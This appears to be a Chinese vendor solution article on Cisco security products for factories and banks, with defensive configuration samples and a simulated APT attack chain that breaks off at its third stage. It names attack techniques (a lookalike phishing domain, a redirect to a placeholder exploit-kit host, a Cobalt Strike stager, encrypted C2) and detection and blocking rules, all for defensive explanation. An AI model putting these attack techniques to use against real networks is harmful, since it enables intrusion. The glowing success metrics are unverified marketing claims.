实时响应：30 秒内将被入侵设备 SGT 变更为 Quarantine

效果：准入策略从 500+ ACL 精简为 15 条 SGT 矩阵规则；等保"可信接入"满分通过；BYOD 事件下降 94%。

技术配置示例

          ISE TrustSec + pxGrid ANC
# ---- ISE : 创建安全组标签 (SGT) via ERS API ----
POST /ers/config/sgt
{
  "Sgt": {
    "name": "OT_PLC",
    "value": 200,
    "description": "OT PLC devices - Purdue L1"
  }
}

# ---- TrustSec SGACL ----
# Source: OT_PLC (SGT 200) → Dest: SCADA_Server (SGT 210)
permit tcp dst eq 502       # Modbus
permit tcp dst eq 44818     # EtherNet/IP
permit udp dst eq 2222      # EtherNet/IP implicit
deny ip                       # Default Deny

# ---- pxGrid ANC : REST API 触发隔离 ----
POST /pxgrid/ise/radius/anc
{
  "OperationAdditionalData": {
    "additionalData": [
      {"name":"macAddress", "value":"00:1A:2B:3C:4D:5E"},
      {"name":"policyName", "value":"ANC_Quarantine"}
    ]
  }
}

# ---- Catalyst 9300 TrustSec 配置 ----
cts role-based enforcement
cts role-based sgt-map 10.10.1.0/24 sgt 200  ! PLC 子网
cts role-based sgt-map 10.10.2.0/24 sgt 210  ! SCADA 子网

interface GigabitEthernet1/0/1
 description PLC-CNC-001
 switchport access vlan 100
 authentication port-control auto
 mab
 dot1x pae authenticator
 cts manual
  policy static sgt 200 trusted
        

客户价值指标

100%

终端可视化率

Profiling + AI Analytics

15min

外包接入时间

Guest Portal 自助接入

30s

威胁隔离时间

pxGrid ANC 全网 SGT 变更

94%↓

BYOD 安全事件

Posture + MDM 集成

📊 Cisco Secure Network Analytics (SNA)

网络检测与响应 (NDR) · NetFlow 行为分析 · 加密流量分析 (ETA) · ML 异常检测

产品概述

Cisco Secure Network Analytics（原 Stealthwatch）是基于 NetFlow/IPFIX 遥测的网络检测与响应（NDR）平台。它不依赖数据包内容检测（无需镜像或解密），而是通过对全网流量元数据的行为建模与异常分析，发现传统签名检测无法识别的高级威胁。

核心引擎包括：

动态实体建模（Dynamic Entity Modeling）：为每个 IP/用户/设备建立行为基线，包含 100+ 行为维度
多层机器学习（ML）检测：无监督 ML 检测零日威胁；监督 ML 检测已知攻击模式；深度学习分析加密流量
加密流量分析（ETA）：Cisco 独创技术，通过分析 TLS 握手特征、包长分布、时间间隔等元数据，在不解密的情况下识别加密流量中的恶意活动

NIST CSF 2.0 功能映射

CSF 功能	子类别	SNA 能力
识别 ID.AM-3	通信流映射	全网 NetFlow 采集 → 自动生成资产通信拓扑图，发现影子 IT
检测 DE.AE-1	基线与异常检测	动态行为基线 + 94 种预定义告警类型 + 自定义安全事件策略
检测 DE.CM-1	网络持续监控	7×24 无代理监控全网，覆盖 North-South 与 East-West 流量
检测 DE.AE-3	事件关联分析	多源告警关联 → 攻击链可视化（Kill Chain Mapping）
响应 RS.AN-1	事件调查	回溯分析支持数月级流量记录查询，快速还原攻击路径

行业场景

🏭 制造业场景 — 某匿名

痛点：OT 网络中 90% 流量为未加密明文协议，但缺乏持续监控手段。MES/SCADA 系统的异常通信无人感知。

在核心交换机上启用 Flexible NetFlow，OT/IT 全网流量元数据发送至 SNA
为 OT 子网建立专用基线组，基于 7×24 生产节奏建立正常通信模式
配置 OT 专属告警：PLC 外网通信、非工作时间 HMI 登录、SCADA 协议异常
ETA 检测工程师站加密流量中的 C2 信道特征

效果：SNA 能在攻击阶段 5（横向移动）即检测到异常 SMB 扫描行为，发现时间从 72 小时缩短至 8 分钟。

🏦 金融业场景 — 某匿名银行

痛点：85% 以上流量为 TLS 加密，传统 IDS 对加密流量几乎失明。内部数据泄露行为难以发现。

全行部署 SNA，重点覆盖数据中心 East-West 流量
启用 ETA——在不解密的情况下检测加密 C2 通道、数据外传
配置 DLP Alert：监控大于 100MB 的异常外发数据流
与 Secure Firewall FMC 联动：检测到威胁后自动添加阻断规则

效果：加密流量恶意活动检出率提升至 98%；数据泄露发现时间从 45 天缩短至 4 小时。

技术配置示例

          Catalyst 9500 NetFlow + SNA Alert
# ---- Catalyst 9500 : Flexible NetFlow ----
flow record OT-FLOW-RECORD
 match ipv4 source address
 match ipv4 destination address
 match transport source-port
 match transport destination-port
 match ipv4 protocol
 collect counter bytes long
 collect counter packets long
 collect timestamp sys-uptime first
 collect timestamp sys-uptime last

flow exporter SNA-EXPORTER
 destination 10.1.100.50  ! SNA Flow Collector
 source Loopback0
 transport udp 2055
 export-protocol ipfix

flow monitor OT-MONITOR
 record OT-FLOW-RECORD
 exporter SNA-EXPORTER
 cache timeout active 60

interface range Gi1/0/1-48
 ip flow monitor OT-MONITOR input
 ip flow monitor OT-MONITOR output

# ---- SNA : 自定义安全事件策略 (REST API) ----
POST /smc/rest/v1/security-events/custom-policies
{
  "name": "OT_PLC_Anomalous_External_Comm",
  "severity": "critical",
  "conditions": [
    {"field":"source_host_group", "op":"IN", "value":["OT_PLC_Group"]},
    {"field":"dest_host_group", "op":"NOT_IN", "value":["OT_Internal"]},
    {"field":"total_bytes", "op":">", "value": 1024}
  ],
  "actions": [
    {"type":"alert", "target":"soc_team"},
    {"type":"pxgrid_anc", "policy":"ANC_Quarantine"}
  ]
}
        

客户价值指标

8min

威胁发现时间

从 72 小时缩短至分钟级

98%

加密威胁检出

ETA 无需解密

100%

East-West 覆盖

NetFlow 无代理全网监控

45d→4h

数据泄露发现

行为分析 + DLP 策略

💻 Cisco Secure Client

统一终端代理 · ZTNA · VPN · Umbrella DNS · 终端态势评估 · NVM

产品概述

Cisco Secure Client 是终端安全与连接的统一代理（Unified Agent），在一个客户端中集成了多项关键安全功能：

VPN 接入：SSL/IPsec 远程接入，支持 Always-On + Per-App VPN
零信任网络访问（ZTNA）：与 Cisco Secure Access（SSE）集成，实现无 VPN 的零信任应用访问
终端态势评估（Posture）：与 ISE 联动，检查补丁级别、防病毒状态、磁盘加密等
Network Visibility Module (NVM)：采集终端级 NetFlow/IPFIX 数据，延伸至 SNA
Umbrella Roaming Module：DNS 层安全保护，离网也能阻断恶意域名
ThousandEyes 端点代理：网络性能与用户体验监控

Secure Client 是将安全策略从"网络边界"延伸到"每一台终端"的关键支点。

NIST CSF 2.0 功能映射

CSF 功能	子类别	Secure Client 能力
识别 ID.AM-1	终端资产管理	NVM 模块采集终端进程、网络连接、用户身份信息，上报至 SNA
保护 PR.AC-3	远程访问管理	Always-On VPN + ZTNA 确保远程接入始终通过安全通道
保护 PR.AC-7	终端认证	证书 + MFA 双因素 + Posture 合规 → 三重验证
保护 PR.DS-2	传输中数据保护	DTLS/TLS 1.3 加密隧道保护所有远程传输数据
检测 DE.CM-7	终端监控	Umbrella DNS 检测恶意域名；NVM 检测终端异常出站行为

行业场景

🏭 制造业场景 — 某匿名

痛点：设备供应商远程维保需要 VPN 接入 OT 网络，但普通 VPN 给予过宽权限（Full Tunnel），维保人员可以触及所有 OT 子网。

为供应商部署 Secure Client + Per-App VPN，仅允许特定维保工具流量进入 VPN 隧道
接入时触发 ISE Posture 检查：防病毒 + 补丁 ≤ 30 天 + 磁盘加密
通过 ZTNA 精确控制：仅能访问指定 PLC（IP 范围限定），且仅在预约时间窗口内
NVM 持续记录维保人员所有操作行为，用于事后审计

效果：供应商访问权限从"全网可达"收缩至"单一设备 + 单一应用"；100% 可审计。

🏦 金融业场景 — 某匿名银行

痛点：3000+ 员工远程办公常态化，VPN 并发峰值导致 ASA 性能瓶颈，且家庭终端安全状态参差不齐。

从传统 ASA VPN 迁移至 Secure Client + Secure Access ZTNA 模式
核心业务通过 ZTNA 发布，无需完整 VPN 隧道
Always-On + Umbrella DNS：家庭网络中钓鱼 DNS 在解析阶段即被拦截
不合规终端仅允许访问 IT 自助修复门户

效果：VPN 并发压力下降 70%；远程安全事件减少 89%；接入延迟降低 40%。

技术配置示例

          Per-App VPN Profile + ISE Posture
<!-- Secure Client Profile : Per-App VPN for OT Maintenance -->
<AnyConnectProfile>
  <ServerList>
    <HostEntry>
      <HostName>ot-vpn.mfg-company.com</HostName>
      <PrimaryProtocol>SSL</PrimaryProtocol>
    </HostEntry>
  </ServerList>
  <PerAppVPN>
    <Enabled>true</Enabled>
    <AllowedApplications>
      <Application>
        <Name>TIA Portal</Name>
        <Path>C:\Program Files\Siemens\Automation\*</Path>
      </Application>
      <Application>
        <Name>Rockwell Studio 5000</Name>
        <Path>C:\Program Files\Rockwell Software\*</Path>
      </Application>
    </AllowedApplications>
  </PerAppVPN>
</AnyConnectProfile>

# ---- ISE Posture Policy ----
Posture Policy: "OT_Vendor_Compliance"
  Condition 1: pr_AV_Running = TRUE
  Condition 2: pr_Win_Patch_Level ≤ 30 days
  Condition 3: pr_Disk_BitLocker = Enabled
  → Compliant: Assign SGT "OT_Vendor_Authorized" (SGT 400)
  → Non-Compliant: Redirect to remediation portal
        

客户价值指标

100%

远程会话可审计

NVM + 日志全量记录

70%↓

VPN 并发压力

ZTNA 替代 Full-Tunnel

89%↓

远程安全事件

Posture + Umbrella + Always-On

40%↓

接入延迟

ZTNA 直连 vs VPN 回程

🖥️ Cisco Secure Workload

数据中心微分段 · 应用依赖映射 (ADM) · 运行时保护 · CVE 漏洞扫描 · 多云支持

产品概述

Cisco Secure Workload 提供数据中心和多云环境的工作负载保护，核心能力是"看清 → 分好 → 管住"三步曲：

应用可视化（Application Insight）：通过代理（Agent）或无代理方式，自动发现工作负载之间的所有通信关系，生成应用依赖拓扑图（ADM - Application Dependency Mapping）
微分段策略生成（Micro-Segmentation）：基于 ADM 自动推荐最小权限策略，支持"模拟模式"预验证后再强制执行
工作负载运行时保护（Runtime Protection）：进程行为监控、异常检测、CVE 漏洞扫描、合规基线审计

Secure Workload 支持裸金属、虚拟机、容器（K8s）和多云（AWS/Azure/GCP）环境，是实现"东西向零信任"的核心产品。

NIST CSF 2.0 功能映射

CSF 功能	子类别	Secure Workload 能力
识别 ID.AM-2/5	软件与通信清单	ADM 自动发现应用间通信依赖关系 + 运行进程清单
识别 ID.RA-1	漏洞识别	CVE 漏洞扫描：对比已安装软件包与 NVD 数据库，生成风险评分
保护 PR.AC-5	网络分段	自动生成并强制执行工作负载级微分段策略（白名单模式）
检测 DE.CM-5	恶意代码检测	进程行为基线异常检测：Crypto Mining、Reverse Shell、权限提升
响应 RS.MI-2	漏洞修复优先级	基于业务影响 + 攻击面可达性的漏洞修复优先级排序

行业场景

🏭 制造业场景 — 某匿名

痛点：MES、ERP、PLM 等关键应用部署在本地数据中心虚拟化平台上，服务器之间缺乏分段，一台 MES 中间件被入侵即可横向访问数据库。

在所有数据中心服务器上部署 Secure Workload Agent
开启 ADM 学习模式（2 周），自动发现 MES↔DB↔ERP↔PLM 完整通信依赖
自动生成微分段策略：MES 前端 → 仅 HTTPS/8443 到中间件；中间件 → 仅 JDBC/1521 到 Oracle DB
策略先在"模拟模式"运行 1 周，确认零误报后切换为"强制执行"
运行时保护：检测到 MES 服务器上未在基线中的 PowerShell 进程 → 立即告警

效果：数据中心东西向攻击面缩减 92%；回溯某匿名事件，阶段 5 横向移动将被微分段完全阻断。

🏦 金融业场景 — 某匿名银行

痛点：核心银行系统云化转型（私有云 + AWS），容器化微服务快速迭代，传统 IP-based ACL 无法适应动态容器 IP。

在私有云和公有云（AWS EKS）统一部署 Secure Workload
K8s 环境通过 DaemonSet 部署，基于 Label/Annotation 而非 IP 定义策略
ADM 自动发现微服务通信：API Gateway → 账户服务 → 交易引擎 → 风控 → DB
CVE 扫描发现 Log4j 2.x 存在于 3 个微服务中 → 自动标记高风险并生成隔离策略
CIS Benchmark for Linux/K8s 自动化审计，不合规项推送给 DevOps

效果：容器策略从 500+ ACL 简化为 18 条 Label-based 策略；关键漏洞修复周期从 30 天缩短至 3 天。

技术配置示例

          Secure Workload — 微分段 + CVE 策略
# ---- Secure Workload : ADM 自动生成的微分段策略 ----
{
  "app_scope": "MES_Production",
  "absolute_policies": [
    {
      "consumer_filter": {"name":"MES_Frontend",
        "query":{"type":"eq","field":"tag_app_role","value":"mes-fe"}},
      "provider_filter": {"name":"MES_Middleware",
        "query":{"type":"eq","field":"tag_app_role","value":"mes-mw"}},
      "l4_params": [{"proto":6,"port":[8443,8443]}],
      "action": "ALLOW"
    },
    {
      "consumer_filter": {"name":"MES_Middleware"},
      "provider_filter": {"name":"Oracle_DB",
        "query":{"type":"eq","field":"tag_app_role","value":"oracle-db"}},
      "l4_params": [{"proto":6,"port":[1521,1521]}],
      "action": "ALLOW"
    }
  ],
  "default_policies": [
    {"action": "DENY", "description": "Default Deny — 白名单模式"}
  ],
  "enforcement_mode": "ENFORCED"
}

# ---- CVE 漏洞扫描策略 ----
PUT /api/v1/workload/cve-policy
{
  "scope": "MES_Production",
  "scan_interval_hours": 24,
  "auto_actions": {
    "CRITICAL": {"action":"isolate", "notify":["soc@company.com"]},
    "HIGH":     {"action":"alert",   "notify":["devops@company.com"]}
  }
}
        

客户价值指标

92%

东西向攻击面缩减

微分段白名单模式

2周

策略零日部署

ADM 学习 + 模拟验证

30d→3d

关键漏洞修复

CVE 优先级排序

97%

合规基线达标

CIS Benchmark 自动审计

🏭 Cisco Cyber Vision

OT/ICS 资产可视化 · 400+ 工业协议 DPI · OT 威胁检测 · IT/OT 融合桥梁

产品概述

Cisco Cyber Vision 是专为 OT/ICS（工业控制系统）环境设计的工业资产可视化与威胁检测平台。与 IT 安全产品不同，Cyber Vision 深度理解工业协议，能够：

OT 资产自动发现：通过被动 DPI 解析 400+ 种工业协议（Modbus、EtherNet/IP、PROFINET、OPC UA、S7Comm、DNP3 等），自动识别每台 OT 设备的厂商、型号、固件版本、运行状态
OT 通信拓扑映射：自动生成 Purdue 模型视图，展示 L0-L5 各层设备间的通信关系
OT 威胁检测：基于 Talos 工业威胁情报 + OT 行为基线检测异常，如固件变更、PLC 程序下载、未授权工程站通信
IT/OT 安全融合：与 ISE、Secure Firewall、SNA、XDR 深度集成，将 OT 资产上下文注入 IT 安全运营体系

独特架构优势：Cyber Vision 传感器直接运行在 Cisco IE（Industrial Ethernet）系列交换机上的 IOx 容器中，无需额外部署硬件探针，实现"网络即传感器"。

NIST CSF 2.0 功能映射

CSF 功能	子类别	Cyber Vision 能力
治理 GV.RM-1	OT 风险管理	OT 资产风险评分仪表盘 — 基于漏洞、暴露面、通信异常综合评估
识别 ID.AM-1	资产清单	被动 DPI 自动发现 OT 资产，零部署影响，100% 无侵入
识别 ID.AM-3	通信映射	Purdue 模型可视化 + 设备间通信流量矩阵
识别 ID.RA-1	漏洞管理	自动匹配设备固件版本与已知 CVE，输出 OT 漏洞清单
检测 DE.CM-1	OT 网络监控	工业协议深度检测：PLC 程序变更、固件升级、异常功能码调用
检测 DE.AE-1	异常活动	OT 行为基线偏差检测 + Talos ICS 威胁情报匹配

行业场景

🏭 制造业场景 — 某匿名（核心痛点）

痛点：在某匿名攻击事件中，最致命的问题是"看不见"——IT 安全团队对 OT 网络中有多少设备、什么型号、跟谁通信完全一无所知。

在车间所有 Cisco IE3400/IE3300 交换机上启用 Cyber Vision 传感器（IOx App），零额外硬件成本
被动监听模式（SPAN），对 OT 生产流量零干扰、零延迟
自动发现：2 小时内完成全厂 OT 资产清单（共发现 847 台设备，含 120 台此前未知的"影子设备"）
漏洞匹配发现：23 台 Siemens S7-300 PLC 运行过时固件（CVE-2019-13945），12 台 HMI 使用默认密码
与 ISE 集成：OT 资产分组自动同步为 ISE SGT 标签 → Firewall 策略自动更新
与 SNA 集成：OT 设备画像丰富 SNA 流量分析上下文

效果：OT 资产可视化从 0% → 100%；发现 120 台影子设备 + 23 个关键漏洞；为后续所有安全策略提供了完整的资产底座。

🏦 金融业场景 — 某匿名银行

痛点：分行/网点中存在大量 IoT 设备：ATM（Windows XP/10 IoT）、智能柜员机（VTM）、安防摄像头、UPS 管理模块。这些设备缺乏统一资产管理。

在全行 200 个网点的接入交换机上启用 Cyber Vision Lite 传感器
自动发现网点所有 IoT/OT 设备：ATM、VTM、摄像头、门禁、UPS
漏洞扫描发现 156 台 ATM 运行的 Windows XP Embedded 存在多个高危漏洞
行为基线：ATM 正常仅与核心交易服务器通信，若发起互联网连接 → 立即告警
与 ISE 联动：ATM 自动分类为 ATM_SGT，策略仅允许与核心交易 IP 通信

效果：首次实现全行网点 IoT 资产统一可视化（设备总数比 CMDB 记录多 34%）；ATM 安全策略升级为白名单通信。

技术配置示例

          IE3400 IOx + CV 集成
# ---- IE3400 : 启用 IOx + 部署 Cyber Vision 传感器 ----
configure terminal
  iox

! 配置 SPAN 会话 — 将 OT 端口镜像至 Cyber Vision 传感器
monitor session 1 source interface Gi1/1 - Gi1/24 both
monitor session 1 destination interface AppGigabitEthernet1/1

! Cyber Vision 传感器网络配置（IOx App 容器内）
app-hosting appid CyberVision
 app-vnic AppGigabitEthernet trunk
  vlan 100 guest-interface 0
   guest-ipaddress 10.10.50.10 netmask 255.255.255.0
 app-resource profile custom
  cpu 1500
  memory 1024
  persist-disk 2048

# ---- Cyber Vision → ISE pxGrid 集成 ----
{
  "ise_host": "ise.company.com",
  "auto_sgt_mapping": true,
  "sgt_rules": [
    {"device_type":"PLC",  "vendor":"Siemens", "sgt":200},
    {"device_type":"HMI",  "vendor":"*",       "sgt":210},
    {"device_type":"SCADA","vendor":"*",       "sgt":220}
  ]
}
        

客户价值指标

0→100%

OT 资产可视化

被动 DPI 2 小时全量发现

120台

影子设备发现

此前完全未知

零干扰

部署对生产影响

被动监听 + IOx 容器

400+

支持工业协议数

Modbus / EtherNet-IP / OPC UA ...

☁️ Cisco Secure Access (SSE)

ZTNA · SWG · CASB · FWaaS · DNS 安全 (Umbrella) · DLP · 数字体验监控

产品概述

Cisco Secure Access 是 Cisco 的 Security Service Edge（SSE）平台，是实现 SASE 架构的核心云安全服务。它将多种安全能力融合于云端统一平台：

ZTNA（零信任网络访问）：基于身份和设备态势的应用级访问控制，替代传统 VPN
SWG（安全 Web 网关）：全流量 Web 安全检查，含 URL 过滤、恶意软件扫描、沙箱分析
CASB（云访问安全代理）：SaaS 应用可视化与控制（Shadow IT 发现、DLP、合规审计）
FWaaS（防火墙即服务）：云端 L3/L4 防火墙能力
DNS 安全（原 Umbrella）：在 DNS 解析层阻断恶意域名，第一道防线
DEM（数字体验监控）：ThousandEyes 集成，端到端用户体验可视化

Secure Access 通过全球 30+ PoP 节点提供服务，用户流量就近接入，确保安全与性能的平衡。

NIST CSF 2.0 功能映射

CSF 功能	子类别	Secure Access 能力
治理 GV.SC-1	供应链/SaaS 治理	CASB 发现 Shadow IT SaaS 应用，评估风险等级
保护 PR.AC-3	远程访问保护	ZTNA 实现"永不信任，持续验证"的应用访问模型
保护 PR.DS-2	数据传输保护	SWG + CASB 内联 DLP 防止敏感数据通过 Web/SaaS 泄漏
检测 DE.CM-1	恶意流量检测	DNS 安全层阻断 C2 回连 + SWG 沙箱检测零日恶意下载
检测 DE.CM-6	外部服务监控	CASB 监控 SaaS 应用中的异常行为（大量下载、异地登录）

行业场景

🏭 制造业场景 — 某匿名

痛点：全国 5 个工厂 + 2 个研发中心 + 若干分支办公室，传统 MPLS + 总部出口防火墙架构导致分支互联网访问绕行总部，延迟高且带宽瓶颈严重。

各分支通过 Secure Access Connector 就近接入最近 PoP 节点
互联网流量通过 SWG 检查后直接出站（Local Internet Breakout）
DNS 安全：所有分支 DNS 解析均指向 Secure Access，域名解析层阻断钓鱼/C2
研发中心 DLP 策略：阻止设计图纸（.dwg/.step）通过 Web 邮箱/网盘外发

效果：分支互联网延迟降低 60%；DNS 层拦截钓鱼域名 2,400+/月；研发数据外泄尝试 100% 拦截。

🏦 金融业场景 — 某匿名银行

痛点：大量使用 SaaS 服务（企业微信、钉钉、在线合同签署、云 CRM），但 IT 对 SaaS 使用缺乏可视化，数据泄露风险高。

全行员工通过 Secure Client 接入 Secure Access ZTNA
核心系统仅通过 ZTNA 发布："已认证 + 合规终端 + 非异常地理" → 允许
CASB 发现 47 款未审批 Shadow IT SaaS 服务（含 3 款高风险云盘）
DLP 策略：阻断含"信用卡号/身份证号/银行账号"格式数据上传至非审批 SaaS

效果：Shadow IT 从 47 款收敛至 12 款；核心系统暴露面降低 95%；DLP 月均拦截 340 次。

技术配置示例

          Secure Access — ZTNA + DNS + DLP
# ---- ZTNA 应用发布策略 ----
POST /api/v1/ztna/applications
{
  "name": "MES Production Portal",
  "internal_host": "mes.internal.com",
  "internal_port": 8443,
  "access_policy": {
    "identity_provider": "Azure AD",
    "allowed_groups": ["OT_Engineers","IT_Operations"],
    "device_posture": {
      "disk_encrypted": true,
      "edr_running": true
    },
    "geo_restriction": {"allowed_countries": ["CN"]},
    "continuous_evaluation": true
  }
}

# ---- DNS 安全策略 ----
PUT /api/v1/dns-policies/default
{
  "block_categories": [
    "malware","phishing","command_and_control",
    "cryptomining","newly_seen_domains"
  ],
  "log_all_queries": true
}

# ---- CASB DLP 策略 ----
POST /api/v1/casb/dlp-rules
{
  "name": "Block_Sensitive_Upload",
  "target_apps": {"category":"unapproved_cloud_storage"},
  "data_patterns": [
    {"name":"PRC_ID", "regex":"[1-9]\\d{5}(18|19|20)\\d{9}[\\dXx]"},
    {"name":"CAD_Files", "file_extensions":[".dwg",".step",".stl"]}
  ],
  "action": "block_and_notify"
}
        

客户价值指标

95%↓

应用暴露面

ZTNA 替代 VPN

2400+/月

DNS 钓鱼拦截

域名解析阶段即时阻断

60%↓

分支访问延迟

Local Internet Breakout

340次/月

DLP 敏感数据拦截

CASB 内联 DLP

🔧 Cisco Secure Equipment Access (SEA)

OT 零信任远程访问 · 设备级粒度 · 会话录制 · 时间窗口控制 · 无客户端

产品概述

Cisco Secure Equipment Access（SEA）是专为 OT 远程运维设计的零信任远程访问解决方案。它解决了传统 VPN 无法安全满足的场景：设备供应商、系统集成商需要从外部网络安全地访问工厂车间的 PLC、HMI、机器人控制器等 OT 设备。

SEA 的核心设计理念是"最小权限 + 全程审计 + 零常驻信任"：

设备级粒度访问控制：精确授权访问单一设备的单一端口/协议，而非开放整个 OT 网段
会话录制与审计：所有远程运维会话 100% 录制，支持事后回放
时间窗口控制：基于预约制的访问授权，过期自动回收
无客户端架构：远程用户通过浏览器即可访问，无需安装 VPN 客户端
与 Cisco IR 集成：与 Catalyst IR1100/IR8300 系列工业路由器深度集成

NIST CSF 2.0 功能映射

CSF 功能	子类别	SEA 能力
治理 GV.SC-4	供应商风险管理	对第三方维保人员实施统一的远程访问治理策略
保护 PR.AC-1	身份管理	MFA + IdP 集成（Azure AD/Okta），确保维保人员身份可信
保护 PR.AC-3	远程访问管理	设备级零信任：单一设备 + 单一协议 + 限定时间窗口
保护 PR.AC-4	最小权限	预定义访问模板：只允许特定编程软件到指定 PLC
检测 DE.CM-3	人员活动监控	实时会话监控 + 异常操作告警（尝试越权访问）
响应 RS.AN-3	取证分析	全量会话录制 → 事后回放 → 精确定位问题操作

行业场景

🏭 制造业场景 — 某匿名

痛点（攻击事件直接诱因之一）：攻击者利用窃取的 VPN 凭证进入 OT 网络。传统 VPN 给予"网络层全通"权限，攻击者一旦接入就可扫描整个 OT 子网。

淘汰 OT 远程运维场景中的传统 VPN，替换为 Cisco SEA
在各工厂的 Cisco IR1101 工业路由器上部署 SEA Agent
供应商在 SEA Portal 提交访问申请 → OT 管理员审批 → 浏览器打开会话 → MFA 认证
仅能看到被授权的 PLC/HMI 设备，其他设备完全不可见
会话全程录制，过期自动断开
与 Cyber Vision 联动：维保期间持续监控是否触发 OT 异常告警

效果：如果事件前部署了 SEA，攻击者窃取 VPN 凭证将毫无用处——SEA 需要 MFA + 设备级授权。OT 横向移动在入口即被阻断。

🏦 金融业场景 — 某匿名银行

痛点：ATM/VTM 维保依赖第三方硬件供应商远程接入，传统方式是 VPN 端口或 TeamViewer 等影子 IT 工具，风险极高。

在全行重点网点部署 SEA，替代非标远程工具
ATM 维保标准化：供应商仅能通过 SEA 访问指定 ATM 的 RDP 或诊断端口
会话审计满足 PCI-DSS 8.6 "服务提供商远程访问"合规条款
异常检测：供应商尝试访问授权范围外设备 → 立即断开并告警

效果：第三方远程接入从"黑箱"变为"透明可审计"；影子 IT 远程工具使用量降至零；PCI-DSS 合规率 100%。

技术配置示例

          SEA — 设备资产 + 访问策略 + 审批流
# ---- SEA : 定义 OT 设备资产 ----
POST /api/v1/sea/assets
{
  "name": "CNC-PLC-Line-A-001",
  "type": "PLC",
  "vendor": "Siemens",
  "model": "S7-1500",
  "ip_address": "10.10.1.50",
  "allowed_protocols": [
    {"protocol":"S7Comm", "port":102},
    {"protocol":"HTTPS",  "port":443}
  ],
  "ir_gateway": "IR1101-Workshop-A"
}

# ---- SEA : 访问策略模板 ----
POST /api/v1/sea/access-policies
{
  "name": "Siemens_Monthly_Maintenance",
  "allowed_assets": ["CNC-PLC-Line-A-001","CNC-PLC-Line-A-002"],
  "authentication": {
    "method": "MFA",
    "idp": "Azure AD",
    "mfa_provider": "Duo"
  },
  "time_window": {
    "day_of_month": [15],
    "start_time": "09:00",
    "end_time": "17:00",
    "max_session_duration_minutes": 120
  },
  "session_controls": {
    "recording": true,
    "clipboard_blocking": true,
    "file_transfer": "upload_only",
    "watermark": true,
    "idle_timeout_minutes": 15
  }
}
        

客户价值指标

100%

远程会话录制

全量回放满足合规审计

设备级

访问粒度

单一设备 + 单一协议 + 限定时间

零客户端

部署复杂度

浏览器访问，无需 VPN

100%

影子工具消除

替代 TeamViewer 等非标工具

📦 八大产品协同价值总结

单一产品解决单一问题；真正的安全架构来自产品间的有机协同。以下是八款产品在典型攻击链中的联动效果：

攻击阶段	第一道防线	第二道防线	协同联动
① 钓鱼邮件	Secure Access DNS 阻断恶意域名	Secure Client Umbrella 模块	Talos 情报同步至所有产品
② 初始入侵	Secure Firewall IPS 检测 Payload	Secure Workload 运行时检测异常进程	FMC 告警 → SNA 关联分析
③ C2 通信	SNA ETA 检测加密 C2 信道	Secure Access SWG 阻断 C2 回连	SNA → FMC 自动添加阻断规则
④ 横向移动	ISE TrustSec SGT 微分段阻断	Secure Workload 工作负载微分段	ISE pxGrid → Firewall 动态策略
⑤ OT 渗透	Secure Firewall OT Zone 隔离	Cyber Vision OT 协议异常检测	CV → ISE ANC 自动隔离异常 OT 设备
⑥ 远程运维滥用	SEA 设备级零信任访问	Secure Client Posture 终端合规	SEA + Cyber Vision 联合运维监控
⑦ 数据外传	Secure Access CASB DLP 拦截	SNA 异常外发流量检测	SNA → FMC 出站阻断 + 告警

核心理念：每一道防线不是孤立存在的——产品间通过 pxGrid、Talos 情报、API 联动形成"感知 → 分析 → 决策 → 执行"的自动闭环。

我们已经了解了每款产品的独立能力和它们之间的协同联动。但理论上的防御方案能否经受实战检验？让我们回到引子中那个周五下午的攻击场景——这一次，某匿名已经部署了 Cisco 全栈安全方案。相同的攻击者，相同的手法，不同的结局。

防御模拟

Cisco 全栈联动复盘

相同的攻击者，相同的手法——但这一次，每一步都遇到了阻拦。

🔴 攻击者进度 0 / 7

滚动查看各阶段详情…

🔵 防御者响应 0 / 7

滚动查看各阶段详情…

📧

D1 鱼叉邮件 → Secure Access 拦截

PROTECT DETECT

🔴 攻击动作

APT 发送含恶意 Excel 附件的鱼叉钓鱼邮件，主题伪装为「Q3供应商对账单」，发件人域名 huaru1-group.com（数字 1 替代字母 i）。

ATT&CK: T1566.001 - Spearphishing Attachment

🔵 Cisco 响应链

T+0s	Secure Access (Email)	Talos 情报匹配 — 发件域 `huaru1-group.com` 在新注册域名黑名单中(＜48h)。附件沙箱引爆检出 VBA 宏下载行为。 ✅ 邮件隔离至管理员审查队列
T+2s	Secure Access (DNS)	Umbrella DNS 层阻断 C2 域名 `update-srv.dynamic-dns.net` ✅ DNS 查询返回 NXDOMAIN
T+3s	XDR	关联事件: 3 名员工 2 分钟内收到相同主题邮件 → 生成「钓鱼活动」告警 (High)

          Secure Access — Email Log
Action: QUARANTINE
Reason: Newly_Registered_Domain + Sandbox_Malicious_Macro
SHA256: 8a3f...b7e2
Verdict: Malicious (confidence 97%)
Talos_Intel_Match: APT-CN-2024-0847
        

⛔ 攻击在第 1 步即被阻断 — 邮件未到达用户收件箱。即使攻击者尝试变体（如 OneDrive 分享链接），Umbrella DNS 层也会阻断 C2 通信。

🌐

D2 水坑攻击 → Secure Client + Umbrella 阻断

PROTECT

🔴 攻击动作（假设邮件绕过）

攻击者改用水坑攻击：入侵行业论坛，植入恶意 JS 重定向到漏洞利用页面，利用浏览器 CVE-2024-XXXX 投递 Cobalt Strike stager。

ATT&CK: T1189 - Drive-by Compromise

🔵 Cisco 响应链

T+0s	Secure Client (Umbrella)	JS 重定向至 `exploit-kit.evil.com` → SWG 实时内容检测识别恶意 JS payload。 ✅ HTTPS 连接在 TLS 握手阶段被阻断
T+1s	Secure Client (NGAV)	即使 SWG 绕过，NGAV 模块检测到内存中 Cobalt Strike beacon 特征（反射型 DLL 加载）。 ✅ 进程终止 + 样本上传 Talos
T+3s	SNA	NetFlow 异常：张静 PC 短时间大量 HTTPS 连接到未分类域名 → Concern Index 上升

⛔ 水坑攻击被双层防御阻断 — Umbrella DNS/SWG 提供网络级防护，Secure Client NGAV 提供端点级防护。即使一层被绕过，另一层仍可捕获。

📡

D3 C2 建立 → SNA 加密流量分析 + Firewall 阻断

DETECT RESPOND

🔴 攻击动作（假设已获立足点）

假设攻击者通过 0-day 绕过端点防护，建立 Cobalt Strike C2 通道，使用 HTTPS + Domain Fronting + Malleable C2 profile 伪装为正常 CDN 流量。

ATT&CK: T1071.001, T1573.002

🔵 Cisco 响应链

T+30s	SNA (ETA)	加密流量分析检测到异常 TLS 指纹 — JA3 hash 匹配 Cobalt Strike Malleable C2 profile。周期性信标间隔(60s±5s)。 ⚠ 高置信度告警: Encrypted C2
